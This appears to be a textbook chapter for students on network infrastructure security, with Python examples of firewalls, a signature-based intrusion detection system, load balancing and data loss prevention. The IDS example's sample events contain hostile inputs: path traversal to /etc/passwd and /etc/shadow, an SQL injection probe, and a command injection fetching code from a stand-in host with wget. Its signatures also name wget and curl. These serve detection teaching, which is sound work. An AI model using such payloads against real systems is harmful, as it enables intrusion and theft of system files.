Chapter 7 Network Infrastructure Security - Students Version

Chapter 7 covers the essential aspects of network infrastructure security, including the roles of basic network devices like hubs, switches, and routers, as well as various security devices such as firewalls and intrusion detection systems. It emphasizes the importance of proper device configuration and security measures to protect against unauthorized access and threats. The chapter also discusses advanced security solutions like VPNs, load balancers, and unified threat management appliances.


Chapter 7

Network Infrastructure
Security
Learning Objectives
■ Understand the differences between basic network devices, such as
hubs, bridges, switches, and routers.
■ Identify common concerns related to basic network devices
■ Understand security devices employed in a network
■ Enhance security using security devices
Introduction
• Infrastructure security begins with the design of the infrastructure
itself.
• The proper use of components improves not only performance, but
security as well.
• Network components are not isolated from the computing
environment, and are an essential aspect of a total computing
environment.
• From the routers, switches, and cables that connect the devices, to
the firewalls and gateways that manage communication, from the
network design, to the protocols that are employed—all these items
play essential roles in both performance and security.
Networks
• Networks connect workstations and servers as well as serve as the
means of data communication between these elements.
• Workstation: is the machine that sits on the desktop and is used
every day for sending and reading e-mail, creating spreadsheets,
writing reports in a word processing program, and playing games.
• Servers: are the computers in a network that host applications and
data for everyone to share.
Basic Network Devices
• Networks are used to connect devices together.
• Networks are composed of components that perform networking
functions to move data between devices.
• Networks begin with network interface cards and then continue
in layers of switches and routers.
• Specialized networking devices are used for specific purposes,
such as security and traffic management:
• Network Interface Card (NIC): a card with a connector port for a particular type of
network connection, historically Ethernet or Token Ring, used to connect a server or
workstation to a network (Layer 1).
• Hubs: networking equipment that connects devices using the same protocol (Layer 1). A hub
repeats every frame to every port, so any connected host can read all traffic on the segment;
this is the main reason hubs have been replaced by switches.
• Bridges: networking equipment that connects two segments using the same protocol (Layer 2).
• Switches: form the basis for connections in most Ethernet-based LANs (Layer 2). A switch
forwards a frame only to the port that owns the destination MAC address, which limits casual
sniffing (though not attacks on the switch's MAC table itself).
• Routers: network traffic management devices used to connect different network segments
together (Layer 3).
Device Security, Common Concerns
• As more and more interactive devices (that is, devices you can interact with
programmatically) are being designed, a new threat source has appeared.
• To control access to the management interface, devices typically ship with a default account
and password that must be entered before the device can be configured remotely.
• These default credentials are well known (vendor manuals and public default-password lists
enumerate them), so one of the first steps in securing such a device is to change them and, where
possible, to disable remote administration from untrusted networks.
• Anyone who has purchased a home office router knows the default
configuration settings and can check to see if another user has changed
theirs. If they have not, this is a huge security hole, allowing outsiders to
“reconfigure” their network devices.
Security Devices
• A range of devices can be employed at the network layer to instantiate security
functionality.
• Devices can be used for intrusion detection, network access control, and a wide range of
other security functions.
• Each device has a specific network function and plays a role in maintaining network
infrastructure security.
• Network security devices include:
1. Firewalls
2. VPN concentrators
3. Wireless devices
4. Modems
5. Telephony
6. Intrusion detection systems
7. Network access control
8. Network monitoring/diagnostic
9. Load balancers
10. Proxies
11. Web security gateways
12. Internet content filters
13. Data loss prevention
14. Unified threat management
Firewalls
• A firewall is a network device—
hardware, software, or a
combination thereof—whose
purpose is to enforce a security
policy across its connections by
allowing or denying traffic to
pass into or out of the network.
• The perfect firewall policy is one
that the end user never sees and
one that never allows even a
single unauthorized packet to
enter the network.
Firewalls (Cont.)
How do firewalls work? Firewalls enforce the established security policies. They can do this through a
variety of mechanisms:
• Network Address Translation (NAT): NAT translates private (nonroutable) IP addresses into public
(routable) IP addresses. It is one of the most basic functions provided by a firewall; it hides internal
addressing, but it is not an access control on its own and should not be relied on as one.
• Basic packet filtering: looks at each packet entering or leaving the network and then either accepts
or rejects it based on user-defined rules. Each packet is examined in isolation, so the filter cannot tell
a genuine reply from a forged packet that merely looks like one.
• Stateful packet filtering: also looks at each packet, but examines it in relation to the packets that
came before it. Stateful firewalls keep track of network connections and apply different rule sets
depending on whether the packet belongs to an established session.
• Access control lists (ACLs): ACLs are simple rule sets applied to port numbers and IP addresses. They
can be configured for inbound and outbound traffic and are most commonly used on routers and
switches.
• Application layer proxies: can examine the content of the traffic as well as the ports and IP
addresses. For example, an application layer proxy can look inside a user's web traffic, detect
a malicious website attempting to download malware to the user's system, and block the download.
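The difference between basic and stateful packet filtering is easiest to see on concrete packets. The following is an added example, not code from the chapter: a stateless filter and a stateful filter implementing the same policy (inside hosts in 10.0.0.0/8 may open TCP connections outward; the outside may not open connections inward). The addresses, ports and packets are constructed sample data.

```python
"""Stateless vs stateful packet filtering (added illustration, not from the slides).

Policy for both filters: hosts inside 10.0.0.0/8 may open TCP connections to the
outside; the outside may not open connections inward. The packets below are
constructed sample data, not captured traffic.
"""
from __future__ import annotations

from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")  # assumed internal address range


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # TCP flags present, e.g. frozenset({"SYN", "ACK"})


def is_inbound(pkt: Packet) -> bool:
    return ip_address(pkt.dst) in INTERNAL and ip_address(pkt.src) not in INTERNAL


def stateless_filter(pkt: Packet) -> str:
    """Basic packet filtering: each packet is judged on its own header.

    To let replies to outbound connections back in, a stateless rule has to
    admit any inbound segment with ACK set (the classic "established" keyword).
    Nothing verifies that such a connection exists, so a forged ACK-only
    packet, as sent by an ACK scan, is accepted as well.
    """
    if not is_inbound(pkt):
        return "ACCEPT"
    if "ACK" in pkt.flags:
        return "ACCEPT"  # looks like a reply; cannot be verified
    return "DROP"


class StatefulFilter:
    """Stateful packet filtering: remembers connections the inside opened and
    admits an inbound packet only if it belongs to one of them."""

    def __init__(self) -> None:
        self.connections = set()  # (in_ip, in_port, out_ip, out_port)

    def process(self, pkt: Packet) -> str:
        if not is_inbound(pkt):
            if "SYN" in pkt.flags and "ACK" not in pkt.flags:
                # Outbound connection attempt: record the 4-tuple
                self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "ACCEPT"
        # Inbound: only traffic belonging to a tracked connection passes
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return "ACCEPT" if reverse in self.connections else "DROP"


def run_scenario() -> dict[str, list[str]]:
    """Feed the same constructed packets through both filters."""
    packets = [
        # 1. inside host opens an HTTPS connection outward
        Packet("10.1.2.3", 40000, "203.0.113.5", 443, frozenset({"SYN"})),
        # 2. the server's SYN/ACK reply to that connection
        Packet("203.0.113.5", 443, "10.1.2.3", 40000, frozenset({"SYN", "ACK"})),
        # 3. forged ACK-only probe at SSH from an unrelated host (ACK scan)
        Packet("198.51.100.9", 4444, "10.1.2.3", 22, frozenset({"ACK"})),
        # 4. unsolicited inbound connection attempt
        Packet("198.51.100.9", 4445, "10.1.2.3", 22, frozenset({"SYN"})),
    ]
    stateful = StatefulFilter()
    return {
        "stateless": [stateless_filter(p) for p in packets],
        "stateful": [stateful.process(p) for p in packets],
    }


if __name__ == "__main__":
    for name, verdicts in run_scenario().items():
        print(f"{name:9s} {verdicts}")
```

Both filters accept the legitimate handshake and drop the unsolicited SYN; only the stateful filter drops packet 3, because no connection in its table matches it. That packet is exactly what an ACK scan sends to map which ports a stateless "established" rule lets through.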
VPN Concentrator
• A virtual private network (VPN) is a construct used to provide a secure communication
channel between users across public networks such as the Internet.
• A VPN concentrator is a special endpoint inside a network designed to accept multiple
VPN connections and integrate these independent connections into the network in a
scalable fashion.
• The most common implementation of VPN is via IPSec, a protocol suite for IP security. IPSec
support was originally mandatory for IPv6 nodes and is optional in IPv4; the current IPv6 node
requirements (RFC 6434) only recommend it.
• IPSec can be implemented in hardware, software, or a combination of both, and it can be used
to encrypt any IP traffic.
• The use of encryption technologies allows either:
• The data in a packet to be encrypted (IPSec transport mode): the original packet header can
still be sniffed and observed between source and destination, but the encryption protects the
contents of the packet from inspection.
• Or, the entire packet to be encrypted (IPSec tunnel mode): the whole original packet is encrypted,
placed inside another packet and sent through a tunnel across the public network. An outside observer
then sees only the tunnel endpoints (typically the two gateways), which hides the identity of the
communicating hosts.
Wireless Devices
• Wireless devices bring additional security concerns. There is, by definition,
no physical connection to a wireless device; radio waves or infrared carry
the data, allowing anyone within range to receive it.
• This means that unless you take specific precautions (at minimum, link-layer
authentication and encryption such as WPA2 or WPA3), you have no control over who can
see your data.
• Placing a wireless access point behind the perimeter firewall does not by itself help,
because the firewall only inspects traffic that crosses it; a client that associates with
the access point from the parking lot is already on the inside of the firewall.
• The point of entry from a wireless device to a wired network is performed
at a device called a wireless access point (WAP). Wireless access points can
support multiple concurrent devices accessing network resources through
the network node they create.
Modems
• Modems were once a slow method of remote connection that was used to connect
client workstations to remote services over standard telephone lines.
• Today, the use of the term has expanded to cover devices connected to special digital
telephone lines (DSL modems), cable television lines (cable modems), and fiber modems.
• DSL, cable and fiber services are designed for a continuous connection, which raises
the question of how long a client keeps the same IP address.
• Although some services originally used a static IP arrangement, virtually all have now
adopted the Dynamic Host Configuration Protocol (DHCP) to manage their address
space.
• The security issue with a static IP address is that it is a stationary target for hackers.
• The move to DHCP has not significantly lessened this threat, however, because the
typical IP lease on a cable modem DHCP server is for days.
• This is still relatively stationary, and some form of firewall protection needs to be
employed by the user.
Telephony
• A private branch exchange (PBX) is an extension of the public telephone network into a business.
• PBXs are frequently interconnected and have security requirements as part of this interconnection, as
well as security requirements of their own.
• PBXs are computer-based switching equipment designed to connect telephones into the local phone
system.
• They can be compromised from the outside and used by phone hackers (phreakers) to make phone
calls at the business’s expense.
• Another problem arises when a PBX is interconnected with the data systems: a path then exists
from the telephone network into the internal data network and the Internet, so a firewall is needed.
• Telecommunications firewalls are a distinct type of firewall designed to protect both the PBX and the
data connections.
• The functionality of a telecommunications firewall is the same as that of a data firewall: it is there to
enforce security policies.
• Telecommunication security policies can be enforced even to cover hours of phone use, to prevent
unauthorized long-distance usage through the implementation of access codes and/or restricted
service hours.
Intrusion Detection Systems
• An intrusion detection system (IDS) is a security system that detects
inappropriate or malicious activity on a computer or network.
• IDSs are typically divided into two main categories:
• Host-based IDS (HIDS): Examines activity on an individual system, such as a mail
server, web server, or individual PC.
• Network-based IDS (NIDS): Examines activity on the network itself.
• An IDS has the following logical components:
• Traffic collector (or sensor): Collects activity/events for the IDS to examine.
• Analysis engine: Examines the collected traffic and compares it to known
patterns of suspicious or malicious activity stored in the signature database (signature-based
detection; some engines additionally flag statistical anomalies). It only finds what it can
recognise: an attack that is encoded or fragmented so that it no longer resembles the stored
pattern is missed unless the engine normalises the traffic first.
• Signature database: A collection of patterns and definitions of known suspicious or
malicious activity.
• User interface and reporting: Interfaces with the human element, providing alerts
when appropriate and giving the user a means to interact with and operate the IDS.
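The four components fit together as in the following added example (not code from the chapter): a minimal signature-based NIDS with a sensor, an analysis engine, a signature database and a reporter, run over a handful of constructed HTTP request events. The signatures, addresses and payloads are all made up for the illustration; the last event shows why the engine decodes URL escapes before matching.

```python
"""A minimal signature-based NIDS with the four logical components
(added illustration, not the slides' code). Events and signatures are constructed."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote_to_bytes


@dataclass(frozen=True)
class Signature:
    sid: int
    name: str
    pattern: re.Pattern
    severity: str


# Signature database: patterns of known malicious activity (constructed examples)
SIGNATURE_DB = [
    Signature(1001, "Directory traversal in request", re.compile(rb"\.\./"), "medium"),
    Signature(1002, "SQL injection probe",
              re.compile(rb"(?i)(union\s+select|'\s*or\s+1=1)"), "high"),
    Signature(1003, "Shell command in request",
              re.compile(rb"(?i);\s*(cat|wget|curl)\s"), "high"),
]

# What the traffic collector (sensor) hands to the engine: constructed sample events
SAMPLE_EVENTS = [
    {"src": "192.0.2.10", "dst": "10.0.0.5", "payload": b"GET /index.html HTTP/1.1"},
    {"src": "198.51.100.7", "dst": "10.0.0.5", "payload": b"GET /../../etc/passwd HTTP/1.1"},
    {"src": "198.51.100.7", "dst": "10.0.0.5",
     "payload": b"GET /login?user=admin' OR 1=1-- HTTP/1.1"},
    {"src": "192.0.2.10", "dst": "10.0.0.5",
     "payload": b"GET /cgi-bin/x?cmd=;wget http://evil.example/a HTTP/1.1"},
    # URL-encoded traversal: identical to event 2 once decoded
    {"src": "198.51.100.7", "dst": "10.0.0.5",
     "payload": b"GET /%2e%2e/%2e%2e/etc/shadow HTTP/1.1"},
]


class TrafficCollector:
    """Sensor: yields events in the order they were observed."""
    def __init__(self, events):
        self.events = events

    def __iter__(self):
        return iter(self.events)


class AnalysisEngine:
    """Compares each event against every signature in the database."""
    def __init__(self, db, normalize=True):
        self.db = db
        self.normalize = normalize  # decode URL escapes before matching

    def analyze(self, event) -> list[dict]:
        payload = event["payload"]
        if self.normalize:
            payload = unquote_to_bytes(payload)
        return [
            {"sid": s.sid, "name": s.name, "severity": s.severity,
             "src": event["src"], "dst": event["dst"]}
            for s in self.db if s.pattern.search(payload)
        ]


class Reporter:
    """User interface / reporting: collects alerts and summarises by source."""
    def __init__(self):
        self.alerts: list[dict] = []

    def report(self, alert: dict) -> None:
        self.alerts.append(alert)

    def by_source(self) -> dict[str, int]:
        return dict(Counter(a["src"] for a in self.alerts))


def run_ids(events=SAMPLE_EVENTS, db=SIGNATURE_DB, normalize=True) -> list[dict]:
    engine = AnalysisEngine(db, normalize)
    reporter = Reporter()
    for event in TrafficCollector(events):
        for alert in engine.analyze(event):
            reporter.report(alert)
    return reporter.alerts


if __name__ == "__main__":
    for alert in run_ids():
        print(f"[{alert['severity']:6s}] sid={alert['sid']} {alert['name']} from {alert['src']}")
```

With normalisation on, the engine raises four alerts; with it off (`run_ids(normalize=False)`) the `%2e%2e/` request slips past, which is the evasion the caveat above is about.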
Network Access Control
• Network access control (NAC) refers to managing the endpoints on a
case-by-case basis as they connect.
• NAC is built around the idea that the network should be able to
enforce a specific level of endpoint security before it accepts a new
connection.
• The initial vendors were Microsoft and Cisco, but NAC now has a
myriad of vendors, with many different solutions providing different
levels of “health” checks before allowing a device to join a network.
Network Monitoring/Diagnostic
• Networks need management, monitoring, and fault resolution.
• SNMP was developed to perform this function across networks.
• SNMP, the Simple Network Management Protocol, is a part of the
Internet Protocol suite of protocols.
• SNMP is an open standard, designed for transmission of management
functions between devices.
• SNMP is also a target in its own right: versions 1 and 2c authenticate with a community
string sent in plaintext, and a write-enabled community string lets anyone who learns it
reconfigure the device. Use SNMPv3 with authentication and privacy enabled, and restrict
which hosts may query the agent.
Load Balancers
• Certain systems, such as servers, are more critical to business operations and
should therefore be the object of fault-tolerance measures.
• A common technique that is used in fault tolerance is load balancing – which
involves the use of devices that move loads across a set of resources in an effort
not to overload individual servers.
• This technique is designed to distribute the processing load over two or more
systems which can increase the fault tolerance of the overall system.
• It is used to help improve resource utilization and throughput
• When a load balancer moves loads across a set of resources, it decides which
machine gets a request via a scheduling algorithm. Two scheduling
algorithms are common:
• Affinity-based scheduling: keeps a client connected to the same server across a
session (useful when session state lives on that server, at the cost of losing the state
if the server fails).
• Round-robin scheduling: sends each new request to the next server in rotation.
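Both algorithms, together with the health checks that make them fault-tolerant, are shown in the following added example (not code from the chapter). Backend names and client identifiers are assumptions; the scenario pins a client to a backend, then takes that backend down to show how the affinity table is repaired.

```python
"""Round-robin and affinity (sticky) scheduling with health checks
(added illustration, not the slides' code). Backend and client names are made up."""
from __future__ import annotations


class LoadBalancer:
    def __init__(self, backends: list[str], algorithm: str = "round_robin") -> None:
        if algorithm not in ("round_robin", "affinity"):
            raise ValueError(f"unknown algorithm {algorithm!r}")
        self.backends = list(backends)
        self.healthy = set(backends)       # maintained by health checks
        self.algorithm = algorithm
        self._next = 0                      # round-robin cursor
        self._sticky = {}                   # client -> pinned backend

    def mark_down(self, backend: str) -> None:
        """Health check failed: stop sending new requests to this backend."""
        self.healthy.discard(backend)

    def mark_up(self, backend: str) -> None:
        self.healthy.add(backend)

    def _round_robin(self) -> str:
        # Walk the ring once, skipping backends the health check has removed
        for _ in range(len(self.backends)):
            candidate = self.backends[self._next % len(self.backends)]
            self._next += 1
            if candidate in self.healthy:
                return candidate
        raise RuntimeError("no healthy backend available")

    def _affinity(self, client: str) -> str:
        backend = self._sticky.get(client)
        if backend in self.healthy:
            return backend                  # keep the session on the same server
        backend = self._round_robin()       # first visit, or pinned backend failed
        self._sticky[client] = backend
        return backend

    def route(self, client: str) -> str:
        if self.algorithm == "affinity":
            return self._affinity(client)
        return self._round_robin()


def demo() -> dict[str, list[str]]:
    rr = LoadBalancer(["app1", "app2", "app3"])
    rr_path = [rr.route(c) for c in ["c1", "c2", "c3", "c1"]]

    sticky = LoadBalancer(["app1", "app2", "app3"], "affinity")
    sticky_path = [sticky.route(c) for c in ["c1", "c2", "c1", "c3", "c1"]]
    sticky.mark_down("app1")                # health check fails for app1
    after_failure = [sticky.route("c1"), sticky.route("c1")]
    return {
        "round_robin": rr_path,
        "affinity": sticky_path,
        "affinity_after_failure": after_failure,
    }


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:24s} {path}")
```

Round-robin spreads c1's two requests over different servers; affinity keeps c1 on app1 until app1 fails, after which c1 is re-pinned to the next healthy server and any server-side session state it had on app1 is gone.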
Proxies
• Proxies serve to manage connections between
systems, acting as relays for the traffic.
• A proxy server (or simply proxy) can be used to
filter out undesirable traffic and prevent
employees from accessing potentially hostile
websites.
• A proxy server takes requests from a client
system and forwards them to the destination
server on behalf of the client.
• From a security perspective, proxies are most
useful in their ability to control and filter
outbound requests.
Proxies (Cont.)
Several major categories of proxy servers are in use:
• Anonymizing proxy: is designed to hide information about the requesting system and
make a user’s web browsing experience “anonymous.”
• Caching proxy: keeps local copies of popular client requests and is often used in large
organizations to reduce bandwidth usage and increase performance.
• Content-filtering proxies: examine each client request and compare it to an established
acceptable use policy (AUP).
• Open proxy: is essentially available to any Internet user and often has some anonymizing
capabilities as well.
• Reverse proxy: is typically installed on the server side of a network connection, often in
front of a group of web servers; clients talk only to the proxy, which hides the servers'
addresses and can terminate TLS and filter requests before they reach them.
• Forward proxy: sits on the client side and forwards clients' outbound requests to servers,
applying policy based on a variety of parameters (user, destination, content type).
• Web proxy: is solely designed to handle web traffic and is sometimes called a web cache.
Web Security Gateways
• Some security vendors combine proxy functions with content-filtering functions to create
a product called a web security gateway.
• They are intended to address the security threats and pitfalls unique to web-based traffic.
• Web security gateways typically provide the following capabilities:
• Real-time malware protection (a.k.a. malware inspection): The ability to scan all
outgoing and incoming web traffic to detect and block undesirable traffic such as
malware, spyware, adware, malicious scripts, file-based attacks, and so on.
• Content monitoring: The ability to monitor the content of web traffic being examined
to ensure that it complies with organizational policies.
• Productivity monitoring: The ability to measure the types and quantities of web
traffic being generated by specific users, groups of users, or the entire organization.
• Data protection and compliance: Scanning web traffic for sensitive or proprietary
information being sent outside of the organization, as well as for the use of social network
sites or inappropriate sites.
Internet Content Filters
• The term Internet content filter, or just content filter, is applied to any device,
application, or software package that examines network traffic (especially web
traffic) for undesirable or restricted content.
• In addition to filtering undesirable content, such as pornography, some content
filters can also filter out malicious activity such as browser hijacking attempts or
cross-site scripting (XSS) attacks.
• A content filter could be a software package loaded on a specific PC or a network
appliance capable of filtering an entire organization’s web traffic.
• Content-filtering systems face many challenges, because the ever-changing
Internet makes it difficult to maintain lists of undesirable sites (sometimes called
block lists, deny lists or blacklists).
• To help administrators, most commercial content-filtering solutions provide an
update service, much like IDS or antivirus products, that updates keywords and
undesirable sites automatically.
Data Loss Prevention
• Data loss prevention (DLP): refers to technology employed to detect and
prevent unauthorized transfers of sensitive data out of an enterprise.
• Employed at key locations, DLP technology can scan packets for specific
data patterns.
• This technology can be tuned to detect account numbers, secrets, specific
markers, or files.
• When specific data elements are detected, the system can block the
transfer.
• The primary challenge in employing DLP technologies is the placement of
the sensor.
• The DLP sensor needs to be able to observe the data, so if the channel is
encrypted, network DLP can be thwarted. This is why network DLP is usually paired with
TLS interception at the proxy or with endpoint (host-based) DLP agents that see the data
before it is encrypted.
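The kind of pattern matching a DLP sensor does, and its limit on an encrypted channel, are shown in this added example (not code from the chapter). It detects payment card numbers by regular expression plus Luhn check, which is what keeps ordinary 16-digit order numbers from firing, and classification markers by literal match. The markers, sample text and the XOR stand-in for an encrypted channel are constructed for the illustration.

```python
"""Pattern-based DLP scan for card numbers and classification markers
(added illustration, not the slides' code). Sample inputs are constructed."""
from __future__ import annotations

import hashlib
import itertools
import re

# Candidate: 13-19 digits, optionally separated by spaces or dashes, not
# embedded in a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
MARKERS = ("INTERNAL ONLY", "CONFIDENTIAL")   # assumed classification markers


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by payment card numbers; rejects most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan(text: str) -> list[dict]:
    """Return the sensitive elements found; card numbers are masked to the last 4."""
    hits = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append({"kind": "pan", "value": "*" * (len(digits) - 4) + digits[-4:]})
    for marker in MARKERS:
        if marker in text:
            hits.append({"kind": "marker", "value": marker})
    return hits


def opaque_channel(text: str) -> str:
    """Stand-in for an encrypted channel: XOR with a fixed pseudo-random stream.
    NOT real cryptography; it only makes the bytes unreadable to the scanner."""
    stream = itertools.cycle(hashlib.sha256(b"constructed session key").digest())
    return bytes(b ^ k for b, k in zip(text.encode(), stream)).decode("latin-1")


if __name__ == "__main__":
    sample = "Invoice for card 4111 1111 1111 1111, order 1234567890123456"
    print(scan(sample))                   # one masked card number, no order number
    print(scan("INTERNAL ONLY: Q3 roadmap"))
    print(scan(opaque_channel(sample)))   # nothing: sensor sees ciphertext
```

4111 1111 1111 1111 passes the Luhn check and is reported masked; 1234567890123456 matches the regular expression but fails Luhn and is ignored. The same invoice text pushed through the opaque channel yields no hits at all, which is the sensor-placement problem in one line.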
Unified Threat Management
• Many security vendors offer “all-in-one
security appliances,” which are devices
that combine multiple functions into
the same hardware appliance.
• A common name for these all-in-one
appliances is unified threat
management (UTM) appliance.
• A UTM solution can have better
integration and efficiencies in handling
network traffic and incidents than a
collection of tools connected together.
• The trade-off is that the appliance becomes
a single point of failure and a single
high-value target; its own patching,
administrative access and logging need the
same rigor as the devices it replaces.
Chapter 7 Summary
After reading this chapter, you should be able to:
• Understand the differences between basic network devices, such as
hubs, bridges, switches, and routers.
• Identify common concerns related to basic network devices
• Understand security devices employed in a network
• Enhance security using security devices
End of Chapter 7
